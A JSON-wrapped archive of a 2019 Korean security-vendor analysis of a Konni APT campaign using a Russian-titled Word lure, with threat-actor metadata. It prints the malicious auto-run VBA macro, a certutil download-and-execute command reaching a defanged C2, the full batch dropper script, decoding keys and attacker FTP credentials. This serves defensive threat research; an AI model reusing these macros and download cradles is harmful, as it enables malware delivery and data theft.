{ "id": "67127603-9df1-4943-ab10-448d035174cd", "created_at": "2026-04-06T00:09:13.117751Z", "updated_at": "2026-04-10T03:37:40.922356Z", "deleted_at": null, "sha1_hash": "24de74a09459add869dddda14f93aa90a005bb7e", "title": "코니(Konni) APT 조직, 러시아 문서로 위장한 공격 등장", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 198014, "plain_text": "코니(Konni) APT 조직, 러시아 문서로 위장한 공격 등장\r\nBy 알약(Alyac)\r\nPublished: 2019-08-19 · Archived: 2026-04-05 21:14:46 UTC\r\n안녕하세요? 이스트시큐리티 시큐리티대응센터(이하 ESRC)입니다.\r\n지난 08월 16일(금) 러시아어 파일명을 쓰는 악성파일이 보안 모니터링 과정 중에 발견되었습니다. 그러나\r\n해당 악성문서는 한국어 기반으로 제작되었습니다.\r\nESRC는 공격벡터와 코드기법 등을 종합적으로 분석한 결과 코니(Konni) 시리즈로 분석을 완료하였습니\r\n다.\r\n코니 시리즈는 수년간 꾸준히 발견되는 위협 캠페인 중에 하나이며, 06월 10일 【[스페셜 리포트] APT 캠\r\n페인 'Konni' \u0026 'Kimsuky' 조직의 공통점 발견】 리포트를 공개한 바 있습니다.\r\n■ 러시아 문서로 위장한 APT 공격 분석\r\n 파일명 \r\n 작\r\n성\r\n자\r\n 최종 수\r\n정자\r\n 최종 수정\r\n일\r\n MD5 \r\nhttps://blog.alyac.co.kr/2474\r\nPage 1 of 17\n\nО ситуации на\r\nКорейском полуострове и\r\nперспективах диалога\r\nмежду США и КНДР.doc\r\n 000\r\n Windows\r\nUser\r\n 2019-07-\r\n12 09:30:39\r\n(UTC)\r\n 660a640e702606341ab0d42724380322\r\n식별된 악성파일은 MS Word 문서파일로 파일명은 'О ситуации на Корейском полуострове и перспективах\r\nдиалога между США и КНДР.doc' 입니다.\r\n이 러시아어를 구글 번역기에 적용해 한국어로 변환하면 '한반도의 상황과 미국과 북한의 대화전망' 표현\r\n이 됩니다.\r\n [그림 1] 악성파일명 러시아어 구글 번역기 화면\r\n문서파일 내부 코드를 보면, 'ObjectPool' 스트림과 VBA 매크로가 포함된 것을 알 수 있습니다. 악성 문서파\r\n일은 매크로 기능을 통해 악성코드가 작동하고, 오브젝트에 포함된 코드를 통해 명령제어(C2) 서버로 연\r\n결을 시도합니다.\r\nhttps://blog.alyac.co.kr/2474\r\nPage 2 of 17\n\n[그림 2] DOC 문서 내부 구조 화면\r\n악성 문서파일이 실행되면 다음과 같이 러시아어로 작성된 화면이 흐리게 보이고, 보안 경고 메시지가 보\r\n여집니다. \r\n악성 DOC 문서의 본문을 흐리게 만든 이유는 이용자로 하여금 매크로 실행을 유도하는 기법입니다.  \r\n만약, 이용자가 문서화면에 이상함을 느껴 [콘텐츠 사용] 버튼을 클릭하게 되면 정상적인 문서 화면이 나\r\n타나면서, 백그라운드로 악성 매크로 코드가 실행됩니다.\r\nhttps://blog.alyac.co.kr/2474\r\nPage 3 of 17\n\n[그림 3] 악성 문서가 실행된 후 매크로 실행 전후 비교\r\nDOC 문서는 본문이 러시아어로 작성되어 있지만, 문서 내부 코드페이지는 한국어(949)가 사용되었습니\r\n다. 공격자가 악성코드를 작성할 때 한국어 기반에서 만들었다는 점을 추정할 수 있는 단서 중에 하나입니\r\n다.\r\nhttps://blog.alyac.co.kr/2474\r\nPage 4 of 17\n\n[그림 4] 악성파일 내부 한글 인코딩 사용\r\n매크로 코드는 다음과 같이 구성되어 있는데, 과거 코니 시리즈에서 유사한 사례가 포착된 바 있습니다.\r\n이 내용은 아랫부분에 포함된 유사 비교 내용을 참고해 주시기 바랍니다.\r\n' module: ThisDocument\r\nAttribute VB_Name = \"ThisDocument\"\r\nAttribute VB_Base = \"1Normal.ThisDocument\"\r\nAttribute VB_GlobalNameSpace = False\r\nAttribute VB_Creatable = False\r\nAttribute VB_PredeclaredId = True\r\nAttribute VB_Exposed = True\r\nAttribute VB_TemplateDerived = True\r\nAttribute VB_Customizable = True\r\nAttribute VB_Control = \"TextBox1, 0, 0, MSForms, TextBox\"\r\nAttribute VB_Control = \"TextBox2, 1, 1, MSForms, TextBox\"\r\nAttribute VB_Control = \"TextBox3, 2, 2, MSForms, TextBox\"\r\nPublic Function Hex2Chr(ByVal HexValue As String) As String\r\nhttps://blog.alyac.co.kr/2474\r\nPage 5 of 17\n\nFor i = 1 To Len(HexValue)\r\nNum = Mid(HexValue, i, 2)\r\nValue = Value \u0026 Chr(Val(\"\u0026h\" \u0026 Num))\r\ni = i + 1\r\nNext i\r\nHex2Chr = Value\r\nEnd Function\r\nPrivate Sub Document_Open()\r\nDim nResult As Long\r\nDim sCmdLine As String\r\nWith ActiveDocument.Content\r\n.Font.ColorIndex = wdBlack\r\nEnd With\r\nIf (TextBox1.Text \u003c\u003e \"\") Then\r\nsCmdLine = Environ(\"windir\")\r\nnResult = InStr(Application.Path, \"x86\")\r\nIf nResult \u003c\u003e 0 Then\r\nsCmdLine = sCmdLine \u0026 Hex2Chr(TextBox1.Text)\r\nElse\r\nsCmdLine = sCmdLine \u0026 Hex2Chr(TextBox2.Text)\r\nEnd If\r\nsCmdLine = sCmdLine + Hex2Chr(TextBox3.Text)\r\nnResult = Shell(sCmdLine, vbHide)\r\nTextBox1.Text = \"\"\r\nTextBox2.Text = \"\"\r\nTextBox3.Text = \"\"\r\nhttps://blog.alyac.co.kr/2474\r\nPage 6 of 17\n\nActiveDocument.Save\r\nEnd If\r\nEnd Sub\r\n매크로 코드 명령에 의해 'ObjectPool' 스트림에 포함되어 있는 'contents' 오브젝트가 실행됩니다. 이 코드\r\n내부에는 다음과 같이 특정 HEX 값이 포함되어 있습니다.\r\n[그림 5] DOC 오브젝트에 포함되어 있는 HEX 코드\r\n이 HEX 코드들의 ASCII 코드를 스트링 형태로 살펴보면 다음과 같이 나타납니다.\r\nhttps://blog.alyac.co.kr/2474\r\nPage 7 of 17\n\n[그림 5-1] HEX 코드를 ASCII 코드로 확인한 화면\r\n이 코드를 문자열로 변환하면 다음과 같이 매크로에 의해 접속되는 C2 서버와 배치파일 명령을 볼 수 있게\r\n됩니다.\r\ncopy /y %windir%\\system32\\certutil.exe %temp%\\mx.exe \u0026\u0026 cd /d %temp% \u0026\u0026 mx -urlcache -split -f\r\nhttp://handicap.eu5[.]org/1.txt \u0026\u0026 mx -decode -f 1.txt 1.bat \u0026\u0026 del /f /q 1.txt \u0026\u0026 1.bat\r\n공격자가 사용한 C2 서버는 'handicap.eu5[.]org' 주소이며, '1.txt' 파일을 불러오고, '1.txt' 파일은 Base64 코드\r\n로 인코딩되어 있습니다.\r\n해당 코드는 시스템 경로에 존재하는 정상파일 'certutil.exe' 파일을 임시폴더(temp) 경로에 'mx.exe' 파일명\r\n으로 복사한 후 '1.txt' Base64 코드를 디코딩하게 됩니다.\r\n[그림 6] '1.txt' Base64 인코딩 화면\r\n디코딩된 '1.txt' 파일은 배치파일 명령어 조합으로 다음과 같이 C2 주소로 접속해 파일을 받고, '2.txt', '3.txt'\r\n파일을 로딩하게 됩니다.\r\n@echo off\r\nif not exist \"%PROGRAMFILES(x86)%\" (\r\nmx -urlcache -split -f \"http://handicap.eu5[.]org/2.txt\" \u003e nul\r\nmx -decode -f 2.txt setup.cab \u003e nul\r\ndel /f /q 2.txt \u003e nul\r\n) else (\r\nhttps://blog.alyac.co.kr/2474\r\nPage 8 of 17\n\nmx -urlcache -split -f \"http://handicap.eu5[.]org/3.txt\" \u003e nul\r\nmx -decode -f 3.txt setup.cab \u003e nul\r\ndel /f /q 3.txt \u003e nul\r\n)\r\ndel /f /q mx.exe \u003e nul\r\nif not exist \"setup.cab\" (goto EXIT)\r\nexpand setup.cab -F:* \"%TEMP%\" \u003e nul\r\ndel /f /q setup.cab \u003e nul\r\n:CHECK_ADMIN\r\nnet session \u003e nul\r\nif %errorlevel% equ 0 (goto ADMIN) else (goto NONADMIN)\r\n:ADMIN\r\ndel /f /q \"%TEMP%\\mshlpweb.dll\" \u003e nul\r\n\"%TEMP%\\install.bat\" \u003e nul\r\ngoto EXIT\r\n:NONADMIN\r\nrundll32 \"%TEMP%\\mshlpweb.dll\", EntryPoint \"%TEMP%\\install.bat\"\r\ngoto EXIT\r\n:EXIT\r\ndel /f /q \"%~dpnx0\" \u003e nul\r\n'2.txt', '3.txt' 파일도 동일하게 Base64 인코딩된 파일이며, 복호화를 거친 후, 'setup.cab' 압축파일로 생성되\r\n고, 내부에 존재하는 최종 악성 페이로드를 로드하게 됩니다.\r\n각각 32비트, 64비트용 동일 기능의 악성코드가 포함되어 있습니다.\r\nhttp://handicap.eu5[.]org/1.txt - BAT\r\nhttp://handicap.eu5[.]org/2.txt - 32bit\r\nhttp://handicap.eu5[.]org/3.txt - 64bit\r\nhttp://handicap.eu5[.]org/4.txt - C2\r\nhttps://blog.alyac.co.kr/2474\r\nPage 9 of 17\n\n[그림 7] Cab 압축파일 내부 화면\r\n'mshlpsrvc.dll' 파일은 UPX 패커로 압축이 되어 있으며, 'mshlpsrvc.ini' 파일을 디코딩하여, 또 다른 C2 서버\r\n로 접속을 하게 됩니다.\r\n- http://handicap.eu5[.]org/4.txt\r\nBase64 디코딩시 커스텀 데이터를 비교하게 됩니다.\r\n인코딩된 코드를 디코딩하는데 사용되는 키는 다음과 같습니다.\r\n- 'qaR4sOz2bJ8fxZMFwUK%l7rLIQpucWk90ED=hdGy31nXt5CiYATVojeB6gNH-PvSm'\r\n'4.txt' 파일 역시 동일하게 인코딩되어 있으며 Custom Base64 디코딩시, 이 코드에 의해 FTP 서버로 접속을\r\n시도하게 됩니다. '4.txt' 파일은 공격자 의도에 따라 여러차례 변경이 될 수 있으며, 실제 변경된 사례가 포\r\n착되었습니다.\r\n초기에 사용된 파일에는 다음과 같은 FTP 서버 계정이 사용되었고, 계정이 변경이 된 점도 확인되었습니\r\n다.\r\nftpupload[.]net\r\nb8_24171239 | adfgvx\r\nb7_24340052 | 123qweASDZXC\r\nhttps://blog.alyac.co.kr/2474\r\nPage 10 of 17\n\n[그림 8] handicap 서버에 등록되어 있는 '4.txt' 파일 화면\r\n공격자는 '4.txt' 파일을 이용해 자유자재로 정보탈취 제어를 수행할 수 있으며, 감염 시스템의 정보를 수집\r\n하게 됩니다.\r\n■ 유사 악성 문서 비교\r\nESRC는 이러한 공격 흐름을 2019년 01월 21일 제작된 코니(Konni) 시리즈에서 목격한 바 있습니다.\r\n 파일명\r\n 작성\r\n자 \r\n 최종 수정\r\n자\r\n 최종 수정일  MD5 \r\n geopol18.doc\r\n igtaud.doc\r\n N/A\r\n Windows\r\nUser\r\n 2019-01-21 23:36:00\r\n(UTC)\r\n 68b080cdc748e9357e75a65fba30eaa7\r\n당시 발견된 악성파일은 다음과 같은 화면을 보여주며, 1차 세계대전 관련 내용을 러시아어로 담고 있습\r\n니다. 관련 분석은 'Tencent Security'에서 공개한 바 있습니다.\r\nhttps://blog.alyac.co.kr/2474\r\nPage 11 of 17\n\n[그림 9] 러시아어로 내용을 담고 있는 악성문서 화면\r\n지난 01월 발견된 악성문서 역시 러시아어로 내용을 담고 있지만, 동일하게 코드페이지가 한글(949)로 설\r\n정되어 있습니다.\r\n또한 매크로 코드도 'О ситуации на Корейском полуострове и перспективах диалога между США и\r\nКНДР.doc' 사례와 거의 동일합니다.\r\n두개의 매크로 코드를 비교해 보면 동일한 패턴으로 작성이 되었으며, C2가 숨겨진 곳도 일치합니다. 물론\r\n일부 난독화 방식에서 변화가 존재합니다.\r\nhttps://blog.alyac.co.kr/2474\r\nPage 12 of 17\n\n[그림 10] 매크로 코드 비교 화면\r\n'geopol18.doc' 파일도 'ObjectPool' 경로에 다음과 같은 C2 코드가 포함되어 있으나, 이번 'О ситуации на\r\nКорейском полуострове и перспективах диалога между США и КНДР.doc' 파일처럼 HEX 코드로 숨겨져\r\n있진 않습니다.\r\n[그림 11] 'content' 파일에 숨겨져 있는 C2 코드 화면\r\n당시 사용된 C2 서버는 코니 시리즈에서 계속 사용된 바 있는 '1apps[.]com' 도메인이 사용되었습니다.\r\n- http://clean.1apps[.]com/1.txt - BAT\r\nhttps://blog.alyac.co.kr/2474\r\nPage 13 of 17\n\n- http://clean.1apps[.]com/2.txt - 32bit\r\n- http://clean.1apps[.]com/3.txt - 64bit\r\n- http://clean.1apps[.]com/4.txt - C2\r\n'geopol18.doc' 파일에 의해서 받아지는 '2.txt', '3.txt' 파일도 동일하게 CAB 압축파일이며, 내부에\r\n는 'compvgk.dll', 'compvgk.ini', 'compwjd.dll', 'install.bat' 등이 포함되어 있습니다.\r\n'compvgk.dll' 파일도 UPX로 패킹되어 있는데, 내부에 다음과 같은 인코딩 키가 포함되어 있습니다.\r\n- 'HnhD1C2Zo5r4le7LSqck38ROw0NPpF=G6xjBUyuIVXMz-TE/QmAvK9YdftJigasWb'\r\n디코딩 루틴을 비교해 보면, 다음과 같이 키만 변경이 되었고 동일하다는 것을 알 수 있습니다.\r\n[그림 12] 디코딩 루틴 비교 화면\r\n당시 인코딩 기법을 통해 '4.txt' 코드를 로드해 복호화를 수행하는데, 이때도 동일한 FTP 서버가 공격에 사\r\n용되었습니다. 이때 사용된 암호는 'tailung' 문자열이 쓰였는데, 애니메이션 영화 쿵푸팬더에서 타이거로\r\nhttps://blog.alyac.co.kr/2474\r\nPage 14 of 17\n\n나오는 캐릭터명이기도 합니다.\r\n'4.txt' 파일에는 Custom Base64 디코딩에 사용되는 키 코드가 포함되어 있으며, FTP 접속 정보를 보유하고\r\n있습니다. \r\nftpupload[.]net\r\nb9_23329410 | tailung\r\n[그림 13] 인코딩된 C2 복호화 비교 화면\r\n이렇게 동일한 APT 공격 조직이 조금씩 코드를 변경하면서 유포 중인 것을 확인할 수 있습니다.\r\n■ 의도적으로 조작된 변종\r\n2019년 06월 14일, 싱가폴 지역에서 바이러스토탈로 업로드된 코니 변종이 식별됩니다.\r\n 바이러스토탈 업로드 소스  MD5\r\n 619ac026 (web)  c313a3aca90a614dd0ff6ce28c6ae2f0\r\n이 변종 코드를 비교해 보면, 'geopol18.doc' 파일에서 하드코딩된 C2 주소만 특정 보안업체 도메인으로 의\r\n도적으로 조작한 것을 확인할 수 있습니다.\r\n각 악성 DOC 문서에 포함된 ASCII 코드의 스트링 데이터를 비교해 보면, DOC 구조적으로 제작한 것이 아\r\n님을 추정할 수 있습니다.\r\n테스트 목적 등으로 수정되어 업로드되었을 가능성이 있어 보이며, 위협배후를 조사하는데 혼선을 야기\r\n할 수 있어 위협 인텔리전스 리서치에 각별한 주의가 필요해 보입니다. \r\nhttps://blog.alyac.co.kr/2474\r\nPage 15 of 17\n\n[그림 14] 유사 변종 C2 비교 화면\r\nESRC에서는 코니(Konni) 캠페인을 추적 조사하는 과정에서 최근까지 김수키(Kimsuky) APT 그룹과 연관\r\n되는 단서들을 지속적으로 발견하고 있습니다.\r\n두 APT 조직 간의 연관성에 대해 아직 다른 곳에서는 언급되지 않았지만, 단순 우연으로 보기에는 어려운\r\n부분들이 많이 있습니다.\r\n물론, 하나의 APT 공격조직이 고도의 전략으로 상대방 C2 서버까지 은밀하게 침투해 위변조 작업까지 한\r\n것이 아니라면, 동일한 웹쉘(Webshell) 등이 사용될 가능성은 낮아 보입니다.\r\n코니 시리즈의 캠페인이 지속적으로 발견되고 있다는 점에서, 꾸준한 관찰이 필요해 보입니다.\r\nhttps://blog.alyac.co.kr/2474\r\nPage 16 of 17\n\nSource: https://blog.alyac.co.kr/2474\r\nhttps://blog.alyac.co.kr/2474\r\nPage 17 of 17", "extraction_quality": 1, "language": "KO", "sources": [ "Malpedia" ], "references": [ "https://blog.alyac.co.kr/2474" ], "report_names": [ "2474" ], "threat_actors": [ { "id": "aa65d2c9-a9d7-4bf9-9d56-c8de16eee5f4", "created_at": "2025-08-07T02:03:25.096857Z", "updated_at": "2026-04-10T02:00:03.659118Z", "deleted_at": null, "main_name": "NICKEL JUNIPER", "aliases": [ "Konni", "OSMIUM ", "Opal Sleet " ], "source_name": "Secureworks:NICKEL JUNIPER", "tools": [ "Konni" ], "source_id": "Secureworks", "reports": null }, { "id": "b43c8747-c898-448a-88a9-76bff88e91b5", "created_at": "2024-02-02T02:00:04.058535Z", "updated_at": "2026-04-10T02:00:03.545252Z", "deleted_at": null, "main_name": "Opal Sleet", "aliases": [ "Konni", "Vedalia", "OSMIUM" ], "source_name": "MISPGALAXY:Opal Sleet", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2", "created_at": "2022-10-25T15:50:23.280374Z", "updated_at": "2026-04-10T02:00:05.305572Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "Kimsuky", "Black Banshee", "Velvet Chollima", "Emerald Sleet", "THALLIUM", "APT43", "TA427", "Springtail" ], "source_name": "MITRE:Kimsuky", "tools": [ "Troll Stealer", "schtasks", "Amadey", "GoBear", "Brave Prince", "CSPY Downloader", "gh0st RAT", "AppleSeed", "Gomir", "NOKKI", "QuasarRAT", "Gold Dragon", "PsExec", "KGH_SPY", "Mimikatz", "BabyShark", "TRANSLATEXT" ], "source_id": "MITRE", "reports": null }, { "id": "760f2827-1718-4eed-8234-4027c1346145", "created_at": "2023-01-06T13:46:38.670947Z", "updated_at": "2026-04-10T02:00:03.062424Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "G0086", "Emerald Sleet", "THALLIUM", "Springtail", "Sparkling Pisces", "Thallium", "Operation Stolen Pencil", "APT43", "Velvet Chollima", "Black Banshee" ], "source_name": "MISPGALAXY:Kimsuky", "tools": [ "xrat", "QUASARRAT", "RDP Wrapper", "TightVNC", "BabyShark", "RevClient" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d", "created_at": "2025-08-07T02:03:25.101147Z", "updated_at": "2026-04-10T02:00:03.846812Z", "deleted_at": null, "main_name": "NICKEL KIMBALL", "aliases": [ "APT43 ", "ARCHIPELAGO ", "Black Banshee ", "Crooked Pisces ", "Emerald Sleet ", "ITG16 ", "Kimsuky ", "Larva-24005 ", "Opal Sleet ", "Ruby Sleet ", "SharpTongue ", "Sparking Pisces ", "Springtail ", "TA406 ", "TA427 ", "THALLIUM ", "UAT-5394 ", "Velvet Chollima " ], "source_name": "Secureworks:NICKEL KIMBALL", "tools": [ "BabyShark", "FastFire", "FastSpy", "FireViewer", "Konni" ], "source_id": "Secureworks", "reports": null }, { "id": "71a1e16c-3ba6-4193-be62-be53527817bc", "created_at": "2022-10-25T16:07:23.753455Z", "updated_at": "2026-04-10T02:00:04.73769Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "APT 43", "Black Banshee", "Emerald Sleet", "G0086", "G0094", "ITG16", "KTA082", "Kimsuky", "Larva-24005", "Larva-25004", "Operation Baby Coin", "Operation Covert Stalker", "Operation DEEP#DRIVE", "Operation DEEP#GOSU", "Operation Kabar Cobra", "Operation Mystery Baby", "Operation Red Salt", "Operation Smoke Screen", "Operation Stealth Power", "Operation Stolen Pencil", "SharpTongue", "Sparkling Pisces", "Springtail", "TA406", "TA427", "Thallium", "UAT-5394", "Velvet Chollima" ], "source_name": "ETDA:Kimsuky", "tools": [ "AngryRebel", "AppleSeed", "BITTERSWEET", "BabyShark", "BoBoStealer", "CSPY Downloader", "Farfli", "FlowerPower", "Gh0st RAT", "Ghost RAT", "Gold Dragon", "GoldDragon", "GoldStamp", "JamBog", "KGH Spyware Suite", "KGH_SPY", "KPortScan", "KimJongRAT", "Kimsuky", "LATEOP", "LOLBAS", "LOLBins", "Living off the Land", "Lovexxx", "MailPassView", "Mechanical", "Mimikatz", "MoonPeak", "Moudour", "MyDogs", "Mydoor", "Network Password Recovery", "PCRat", "ProcDump", "PsExec", "ReconShark", "Remote Desktop PassView", "SHARPEXT", "SWEETDROP", "SmallTiger", "SniffPass", "TODDLERSHARK", "TRANSLATEXT", "Troll Stealer", "TrollAgent", "VENOMBITE", "WebBrowserPassView", "xRAT" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434153, "ts_updated_at": 1775792260, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/24de74a09459add869dddda14f93aa90a005bb7e.pdf", "text": "https://archive.orkl.eu/24de74a09459add869dddda14f93aa90a005bb7e.txt", "img": "https://archive.orkl.eu/24de74a09459add869dddda14f93aa90a005bb7e.jpg" } }